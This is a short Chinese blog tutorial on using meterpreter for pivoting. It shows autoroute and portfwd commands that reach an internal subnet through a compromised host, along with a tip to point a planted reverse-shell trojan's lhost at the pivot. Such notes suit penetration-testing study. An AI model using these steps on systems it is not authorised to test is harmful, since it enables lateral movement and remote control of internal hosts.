用meterpreter实现跳板机

 

meterpreter跳板机

 

背景:渗透测试者A拿到了B主机的控制权,但没有拿到ssh密码(不能打ssh隧道)。现需横向移动渗透内网主机C,为了避免动作过大不便直接在B上对C进行渗透,其中C不能出公网。现需让B转发AC的流量,并最终使C反弹shellA

 

 

 

方案:使用meterpreter来“打路由”或者做端口映射两种方案

 

 

工作原理:

打路由:在ABsession中增加一条目的为192.168.1.0/24,下一跳为该sessionID的路由

端口映射:在A本地侦听一个空闲端口,通过ABsessionC指定端口做映射

 

 

操作步骤:

一、打路由

meterpreter > run autoroute -s 192.168.1.0/24   ====>添加到目标内网路由

meterpreter > run autoroute -p  ===>查看路由是否添加成功

 

此时使用msf框架内的扫描模块即可扫描192.168.1.2

 

1、在C中植入反弹木马时应设置lhost192.168.1.1  ====>重要!!!B上的meterpreter会自动在192.168.1.1开启相应侦听端口,并将收到的流量转发至A

2、此方法的优点是足够灵活,写一条路由就可以到整个网段的全部端口了。缺点是只在MSF框架内有效,即:使用MSF内的工具可以访问到192.168.1.2,使用MSF外的工具就访问不到192.168.1.2

 

 

二、端口映射

meterpreter > portfwd add -L 100.1.1.1 -l 4444 -r 192.168.1.2 -p 3389

-L 在本地哪个IP上侦听端口

-l 在本地哪个端口上做映射

-r 映射至哪台目标设备

-p 映射至目标设备具体哪个端口

 

注意:此方式缺点是只能一对一做映射,不够灵活。但优点是基于操作系统层面做的端口映射,即:使用MSF外的工具访问4444也能映射至目标设备的3389

 

 

posted @ 2019-03-08 00:10  白桦林_HK  阅读(1737)  评论(0编辑  收藏  举报